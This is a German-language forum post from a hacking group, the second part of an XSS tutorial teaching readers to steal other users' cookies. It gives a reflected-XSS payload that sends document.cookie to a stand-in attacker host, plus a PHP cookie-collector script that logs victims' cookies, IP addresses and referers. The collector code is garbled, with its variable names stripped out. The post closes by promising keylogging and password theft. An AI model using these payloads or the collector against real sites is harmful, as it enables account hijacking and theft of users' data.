Quelle: HBA-CREW
Autor: Unknow
Poster: kazuya
Willkommen zu meinem 2ten Teil von XSS
dieses mal will ich euch wieder schriftlich zeigen wie ihr Cookies von anderen Usern aus XSS Fähigen Pages von zB Benutzern holt.
„Ausspähen von Cookies“ ist ein klassischer XSS-Angriff. Als Beispiel soll folgender Aufruf einer Webanwendung dienen, deren Parameter foo für reflektiertes XSS anfällig ist:
http://www.beispiel.example/anwendung.cgi?foo=[XSS]
Um den Cookie auszuspähen, muss auf dem Client JavaScript-Code eingeschleust werden, der den Cookie an den Server des Angreifers sendet, z.B. so:
document.location.replace(‘http://www.angreifer.example/cookie-sammler.php?
geklautercookie=’+document.cookie)
Dafür benutzt ihr einen FTP Server. Richtet diesen ein. Download Link für den Cookie klau und den speicher ort findet ihr unten.
Beide Dateien werden im / Verzeichniss eingefügt. Guckt vorher ob die Cookie ausgabe klappt indem ihr auf die cookie.php klickt und danach in den cookie text geht. Ist dort die ausgabe wie im cookie.php so habt ihr alles richtig gemacht.
Weiter gehts: Der Angreifer müsste normal diese ausgabe weiterschicken.
http://www.beispiel.example/anwendung.cgi?foo=document.location.replac e(
‘http://www.angreifer.example/cookie-sammler.php?
geklautercookie=’+document.cookie)
Genauso gut könnte der XSS-Code auch z.B. in ein Gästebuch (persistentes XSS) eingetragen oder über DOM-basiertes XSS direkt in den Webbrowser des Opfers eingeschleust werden. Egal wie der Code eingeschleust wird, er sendet sofort den Cookie an den Server des Angreifers. Das dort laufende Skript cookie-sammler.php könnte z.B. folgenden Inhalt haben (statt PHP kann natürlich auch jede andere Sprache verwendet werden):
Code:
<?
// Daten sammeln
= [„geklautercookie“];
= getenv („REMOTE_ADDR“);
= getenv(„HTTP_REFERER“);
= date(„j. F Y, H:i“);
// Eintrag zusammenstellen
= „Cookie: „..“
„;
= .“IP: „..“
„;
= .“Referer: „..“
„;
= .“Datum und Zeit: „..“
„;
= .“
„;
// Eintrag in Datei schreiben
= fopen(„geklaut.html“, „a+“);
fwrite(, );
fclose();
?>
Der Cookie des Opfers wird über den GET-Parameter geklautercookie übergeben, IP-Adresse und Referer werden aus den entsprechenden Einträgen des Environments übernommen. Danach werden die gesammelten Daten aufbereitet und das Ergebnis in die Datei geklaut.html geschrieben.
So Vielen Dank für die Aufmerksamkeit.
Falls euch diese und die andere Anleitunf gefallen hat sagt es und ich werde euch in das tiefere XSS bringen.
Was noch möglich ist [also ich euch zeigen kann] :
Ausspähen von Tastatur Anschlägen durch eine XSS Lücke [Keylog]
Auslesen von Passwörtern.